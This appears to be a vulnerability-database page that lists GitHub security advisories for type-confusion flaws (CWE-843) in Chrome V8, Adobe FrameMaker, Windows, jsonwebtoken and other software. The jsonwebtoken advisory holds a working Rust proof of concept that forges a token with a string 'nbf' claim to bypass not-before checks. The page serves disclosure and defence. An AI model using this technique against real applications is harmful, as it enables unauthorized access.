Common Weakness Enumeration

CWE-843

Allowed

Access of Resource Using Incompatible Type ('Type Confusion')

Abstraction: Base · Status: Incomplete

The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.

1041 vulnerabilities reference this CWE, most recent first.

GHSA-GRFV-8M4F-679X

Vulnerability from github – Published: 2025-03-11 21:30 – Updated: 2025-03-11 21:30
VLAI
Details

Ashlar-Vellum Cobalt VS File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of VS files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25276.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2022"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-11T21:15:53Z",
    "severity": "HIGH"
  },
  "details": "Ashlar-Vellum Cobalt VS File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of VS files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25276.",
  "id": "GHSA-grfv-8m4f-679x",
  "modified": "2025-03-11T21:30:42Z",
  "published": "2025-03-11T21:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2022"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-126"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GX35-9JR2-9663

Vulnerability from github – Published: 2026-05-04 09:31 – Updated: 2026-05-04 15:31
VLAI
Details

In slbc, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10828685; Issue ID: MSV-6504.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-20451"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-04T07:15:59Z",
    "severity": "MODERATE"
  },
  "details": "In slbc, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10828685; Issue ID: MSV-6504.",
  "id": "GHSA-gx35-9jr2-9663",
  "modified": "2026-05-04T15:31:13Z",
  "published": "2026-05-04T09:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20451"
    },
    {
      "type": "WEB",
      "url": "https://corp.mediatek.com/product-security-bulletin/May-2026"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GXRC-QJ6F-5VPH

Vulnerability from github – Published: 2022-09-25 00:00 – Updated: 2022-09-27 00:00
VLAI
Details

MZ Automation's libIEC61850 (versions 1.4 and prior; version 1.5 prior to commit a3b04b7bc4872a5a39e5de3fdc5fbde52c09e10e) accesses a resource using an incompatible type, which could allow an attacker to crash the server with a malicious payload.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-2971"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-23T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "MZ Automation\u0027s libIEC61850 (versions 1.4 and prior; version 1.5 prior to commit a3b04b7bc4872a5a39e5de3fdc5fbde52c09e10e) accesses a resource using an incompatible type, which could allow an attacker to crash the server with a malicious payload.",
  "id": "GHSA-gxrc-qj6f-5vph",
  "modified": "2022-09-27T00:00:15Z",
  "published": "2022-09-25T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2971"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-251-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H29M-97RM-P2V7

Vulnerability from github – Published: 2024-05-14 18:31 – Updated: 2024-07-09 12:30
VLAI
Details

A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V27.1.215). The affected application contains a type confusion vulnerability while parsing IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21573)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-32063"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-14T16:16:59Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions \u003c V27.1.215). The affected application contains a type confusion vulnerability while parsing IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21573)",
  "id": "GHSA-h29m-97rm-p2v7",
  "modified": "2024-07-09T12:30:55Z",
  "published": "2024-05-14T18:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32063"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-064222.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-976324.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-H395-GR6Q-CPJC

Vulnerability from github – Published: 2026-02-03 18:47 – Updated: 2026-02-05 00:34
VLAI
Summary
jsonwebtoken has Type Confusion that leads to potential authorization bypass
Details

Summary:

It has been discovered that there is a Type Confusion vulnerability in jsonwebtoken, specifically, in its claim validation logic.

When a standard claim (such as nbf or exp) is provided with an incorrect JSON type (Like a String instead of a Number), the library’s internal parsing mechanism marks the claim as “FailedToParse”. Crucially, the validation logic treats this “FailedToParse” state identically to “NotPresent”.

This means that if a check is enabled (like: validate_nbf = true), but the claim is not explicitly marked as required in required_spec_claims, the library will skip the validation check entirely for the malformed claim, treating it as if it were not there. This allows attackers to bypass critical time-based security restrictions (like “Not Before” checks) and commit potential authentication and authorization bypasses.

Details:

The vulnerability stems from the interaction between the TryParse enum and the validate function in src/validation.rs.

  1. The TryParse Enum: The library uses a custom TryParse enum to handle claim deserialization:
enum TryParse<T> {
    Parsed(T),
    FailedToParse, // Set when deserialization fails (e.g. type mismatch)
    NotPresent,
}

If a user sends {“nbf”: “99999999999”} (legacy/string format), serde fails to parse it as u64, and it results in TryParse::FailedToParse.

  1. The Validation Logic Flaw (src/validation.rs): In Validation::validate, the code checks for exp and nbf like this:
// L288-291
if matches!(claims.nbf, TryParse::Parsed(nbf) if options.validate_nbf && nbf > now + options.leeway) {
    return Err(new_error(ErrorKind::ImmatureSignature));
}

This matches! macro explicitly looks for TryParse::Parsed(nbf).

• If claims.nbf is FailedToParse, the match returns false. • The if block is skipped. • No error is returned. 1. The “Required Claims” Gap: The only fallback mechanism is the “Required Claims” check:

// Lines 259-267
for required_claim in &options.required_spec_claims {
    let present = match required_claim.as_str() {
        "nbf" => matches!(claims.nbf, TryParse::Parsed(_)),
        // ...
    };
    if !present { return Err(...); }
}

If “nbf” IS in required_spec_claims, FailedToParse will fail the matches!(..., Parsed(_)) check, causing the present to be false, and correctly returning an error.

However, widely accepted usage patterns often enable validation flags (validate_nbf = true) without adding the claim to the required list, assuming that enabling validation implicitly requires the claim’s validity if it appears in the token. jsonwebtoken seems to violate this assumption.

Environment:

• Version: jsonwebtoken 10.2.0 • Rust Version: rustc 1.90.0 • Cargo Version: cargo 1.90.0 • OS: MacOS Tahoe 26.2

POC:

For demonstrating, Here is this simple rust code that demonstrates the bypass. It attempts to validate a token with a string nbf claiming to be valid only in the far future.

create a new project:

cargo new nbf_poc; cd nbf_poc

add required dependencies:

cargo add serde --features derive
cargo add jsonwebtoken --features rust_crypto
cargo add serde_json

replace the code in src/main.rs with this:

use jsonwebtoken::{decode, Validation, Algorithm, DecodingKey, Header, EncodingKey, encode};
use serde::{Deserialize, Serialize};

#[derive(Debug, Serialize, Deserialize)]
struct Claims {
    sub: String,
    nbf: String, // Attacker sends nbf as a String
    exp: usize,
}
fn main() {
    let key: &[u8; 24] = b"RedMouseOverTheSkyIsBlue";

    // nbf is a String "99999999999" (Far future)
    // Real nbf should be a Number.
    let my_claims: Claims = Claims {
        sub: "krishna".to_string(),
        nbf: "99999999999".to_string(), 
        exp: 10000000000, 
    };

    let token: String = encode(&Header::default(), &my_claims, &EncodingKey::from_secret(key)).unwrap();
    println!("Forged Token: {}", token);

    // 2. Configure Validation
    let mut validation: Validation = Validation::new(Algorithm::HS256);
    validation.validate_nbf = true; // Enable NBF check

    // We do NOT add "nbf" to required_spec_claims (default behavior)

    // We decode to serde_json::Value to avoid strict type errors in our struct definition hiding the library bug.
    // The library sees the raw JSON with string "nbf".
    let result: Result<jsonwebtoken::TokenData<serde_json::Value>, jsonwebtoken::errors::Error> = decode::<serde_json::Value>(
        &token, 
        &DecodingKey::from_secret(key), 
        &validation
    );

    match result {
        Ok(_) => println!("Token was accepted despite malformed far-future 'nbf'!"),
        Err(e) => println!("Token rejected. Error: {:?}", e),
    }
}

run cargo run

expected behaviour:

Forged Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJrcmlzaG5hIiwibmJmIjoiOTk5OTk5OTk5OTkiLCJleHAiOjEwMDAwMDAwMDAwfQ.Fm3kZIqMwqIA6sEA1w52UOMqqnu4hlO3FQStFmbaOwk

Token was accepted despite malformed far-future 'nbf'! Impact:

If an application uses jsonwebtoken nbf (Not Before) to schedule access for the future (like “Access granted starting tomorrow”).

By sending nbf as a string, an attacker can bypass this restriction and access the resource immediately.

and for the exp claim (this is unlikely but still adding), If a developer sets validate_exp = true but manually handles claim presence (removing exp from required_spec_claims), an attacker can send a string exp (e.g., “never”) and bypass expiration checks entirely. The token becomes valid forever.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "jsonwebtoken"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25537"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-03T18:47:40Z",
    "nvd_published_at": "2026-02-04T22:15:59Z",
    "severity": "MODERATE"
  },
  "details": "## Summary:\n\nIt has been discovered that there is a Type Confusion vulnerability in jsonwebtoken, specifically, in its claim validation logic.\n\nWhen a standard claim (such as nbf or exp) is provided with an incorrect JSON type (Like a String instead of a Number), the library\u2019s internal parsing mechanism marks the claim as \u201cFailedToParse\u201d. Crucially, the validation logic treats this \u201cFailedToParse\u201d state identically to \u201cNotPresent\u201d.\n\nThis means that if a check is enabled (like: validate_nbf = true), but the claim is not explicitly marked as required in required_spec_claims, the library will skip the validation check entirely for the malformed claim, treating it as if it were not there. This allows attackers to bypass critical time-based security restrictions (like \u201cNot Before\u201d checks) and commit potential authentication and authorization bypasses.\n\n## Details:\n\nThe vulnerability stems from the interaction between the TryParse enum and the validate function in [src/validation.rs](https://github.com/Keats/jsonwebtoken/blob/master/src/validation.rs).\n\n 1. The TryParse Enum: The library uses a custom TryParse enum to handle claim deserialization:\n```\nenum TryParse\u003cT\u003e {\n    Parsed(T),\n    FailedToParse, // Set when deserialization fails (e.g. type mismatch)\n    NotPresent,\n}\n```\nIf a user sends {\u201cnbf\u201d: \u201c99999999999\u201d} (legacy/string format), serde fails to parse it as u64, and it results in TryParse::FailedToParse.\n\n 1. The Validation Logic Flaw (src/validation.rs): In Validation::validate, the code checks for exp and nbf\nlike this:\n```\n// L288-291\nif matches!(claims.nbf, TryParse::Parsed(nbf) if options.validate_nbf \u0026\u0026 nbf \u003e now + options.leeway) {\n    return Err(new_error(ErrorKind::ImmatureSignature));\n}\n```\nThis matches! macro explicitly looks for TryParse::Parsed(nbf).\n\n \u2022 If claims.nbf is FailedToParse, the match returns false.\n \u2022 The if block is skipped.\n \u2022 No error is returned.\n 1. The \u201cRequired Claims\u201d Gap: The only fallback mechanism is the \u201cRequired Claims\u201d check:\n```\n// Lines 259-267\nfor required_claim in \u0026options.required_spec_claims {\n    let present = match required_claim.as_str() {\n        \"nbf\" =\u003e matches!(claims.nbf, TryParse::Parsed(_)),\n        // ...\n    };\n    if !present { return Err(...); }\n}\n```\nIf \u201cnbf\u201d IS in required_spec_claims, FailedToParse will fail the matches!(..., Parsed(_)) check, causing the present to be false, and correctly returning an error.\n\nHowever, widely accepted usage patterns often enable validation flags (validate_nbf = true) without adding the claim to the required list, assuming that enabling validation implicitly requires the claim\u2019s validity if it appears in the token. jsonwebtoken seems to violate this assumption.\n\nEnvironment:\n\n \u2022 Version: jsonwebtoken 10.2.0\n \u2022 Rust Version: rustc 1.90.0\n \u2022 Cargo Version: cargo 1.90.0\n \u2022 OS: MacOS Tahoe 26.2\n\nPOC:\n\nFor demonstrating, Here is this simple rust code that demonstrates the bypass. It attempts to validate a token with a string nbf claiming to be valid only in the far future.\n\ncreate a new project:\n```\ncargo new nbf_poc; cd nbf_poc\n```\nadd required dependencies:\n```\ncargo add serde --features derive\ncargo add jsonwebtoken --features rust_crypto\ncargo add serde_json\n```\nreplace the code in src/main.rs with this:\n\n```\nuse jsonwebtoken::{decode, Validation, Algorithm, DecodingKey, Header, EncodingKey, encode};\nuse serde::{Deserialize, Serialize};\n\n#[derive(Debug, Serialize, Deserialize)]\nstruct Claims {\n    sub: String,\n    nbf: String, // Attacker sends nbf as a String\n    exp: usize,\n}\nfn main() {\n    let key: \u0026[u8; 24] = b\"RedMouseOverTheSkyIsBlue\";\n\n    // nbf is a String \"99999999999\" (Far future)\n    // Real nbf should be a Number.\n    let my_claims: Claims = Claims {\n        sub: \"krishna\".to_string(),\n        nbf: \"99999999999\".to_string(), \n        exp: 10000000000, \n    };\n\n    let token: String = encode(\u0026Header::default(), \u0026my_claims, \u0026EncodingKey::from_secret(key)).unwrap();\n    println!(\"Forged Token: {}\", token);\n\n    // 2. Configure Validation\n    let mut validation: Validation = Validation::new(Algorithm::HS256);\n    validation.validate_nbf = true; // Enable NBF check\n\n    // We do NOT add \"nbf\" to required_spec_claims (default behavior)\n\n    // We decode to serde_json::Value to avoid strict type errors in our struct definition hiding the library bug.\n    // The library sees the raw JSON with string \"nbf\".\n    let result: Result\u003cjsonwebtoken::TokenData\u003cserde_json::Value\u003e, jsonwebtoken::errors::Error\u003e = decode::\u003cserde_json::Value\u003e(\n        \u0026token, \n        \u0026DecodingKey::from_secret(key), \n        \u0026validation\n    );\n\n    match result {\n        Ok(_) =\u003e println!(\"Token was accepted despite malformed far-future \u0027nbf\u0027!\"),\n        Err(e) =\u003e println!(\"Token rejected. Error: {:?}\", e),\n    }\n}\n```\nrun cargo run\n\nexpected behaviour:\n\n```\nForged Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJrcmlzaG5hIiwibmJmIjoiOTk5OTk5OTk5OTkiLCJleHAiOjEwMDAwMDAwMDAwfQ.Fm3kZIqMwqIA6sEA1w52UOMqqnu4hlO3FQStFmbaOwk\n```\nToken was accepted despite malformed far-future \u0027nbf\u0027!\nImpact:\n\nIf an application uses jsonwebtoken nbf (Not Before) to schedule access for the future (like \u201cAccess granted starting tomorrow\u201d).\n\nBy sending nbf as a string, an attacker can bypass this restriction and access the resource immediately.\n\nand for the exp claim (this is unlikely but still adding), If a developer sets validate_exp = true but manually handles claim presence (removing exp from required_spec_claims), an attacker can send a string exp (e.g., \u201cnever\u201d) and bypass expiration checks entirely. The token becomes valid forever.",
  "id": "GHSA-h395-gr6q-cpjc",
  "modified": "2026-02-05T00:34:49Z",
  "published": "2026-02-03T18:47:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Keats/jsonwebtoken/security/advisories/GHSA-h395-gr6q-cpjc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25537"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Keats/jsonwebtoken/commit/abbc3076742c4161347bc6b8bf4aa5eb86e1dc01"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Keats/jsonwebtoken"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "jsonwebtoken has Type Confusion that leads to potential authorization bypass"
}

GHSA-H5PJ-V47C-6VC7

Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-05-24 19:12
VLAI
Details

Type confusion in V8 in Google Chrome prior to 92.0.4515.159 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-30598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-26T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "Type confusion in V8 in Google Chrome prior to 92.0.4515.159 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.",
  "id": "GHSA-h5pj-v47c-6vc7",
  "modified": "2022-05-24T19:12:15Z",
  "published": "2022-05-24T19:12:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30598"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2021/08/stable-channel-update-for-desktop.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/1234764"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5LVY4WIWTVVYKQMROJJS365TZBKEARCF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPJPUSAWIJMQFBQQQYXAICLI4EKFQOH6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QW4R2K5HVJ4R6XDZYOJCCFPIN2XHNS3L"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-H5WM-MMC5-5PVC

Vulnerability from github – Published: 2025-07-23 00:30 – Updated: 2025-07-23 15:31
VLAI
Details

Type Confusion in V8 in Google Chrome prior to 138.0.7204.168 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8011"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-22T22:15:39Z",
    "severity": "HIGH"
  },
  "details": "Type Confusion in V8 in Google Chrome prior to 138.0.7204.168 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
  "id": "GHSA-h5wm-mmc5-5pvc",
  "modified": "2025-07-23T15:31:13Z",
  "published": "2025-07-23T00:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8011"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desktop_22.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/430572435"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H6WR-VQ3G-HH7J

Vulnerability from github – Published: 2026-04-15 00:31 – Updated: 2026-04-15 00:31
VLAI
Details

Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-27298"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-14T23:16:26Z",
    "severity": "HIGH"
  },
  "details": "Adobe Framemaker versions 2022.8 and earlier are affected by an Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.",
  "id": "GHSA-h6wr-vq3g-hh7j",
  "modified": "2026-04-15T00:31:35Z",
  "published": "2026-04-15T00:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27298"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H77Q-4HPH-8VF3

Vulnerability from github – Published: 2026-02-10 18:30 – Updated: 2026-02-10 21:31
VLAI
Details

Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-21519"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-10T18:16:34Z",
    "severity": "HIGH"
  },
  "details": "Access of resource using incompatible type (\u0027type confusion\u0027) in Desktop Window Manager allows an authorized attacker to elevate privileges locally.",
  "id": "GHSA-h77q-4hph-8vf3",
  "modified": "2026-02-10T21:31:29Z",
  "published": "2026-02-10T18:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21519"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H8M5-6QP4-4PMM

Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09
VLAI
Details

Type confusion in V8 in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-30588"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-03T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "Type confusion in V8 in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.",
  "id": "GHSA-h8m5-6qp4-4pmm",
  "modified": "2022-05-24T19:09:41Z",
  "published": "2022-05-24T19:09:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-30588"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop_20.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/1195650"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5LVY4WIWTVVYKQMROJJS365TZBKEARCF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPJPUSAWIJMQFBQQQYXAICLI4EKFQOH6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QW4R2K5HVJ4R6XDZYOJCCFPIN2XHNS3L"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.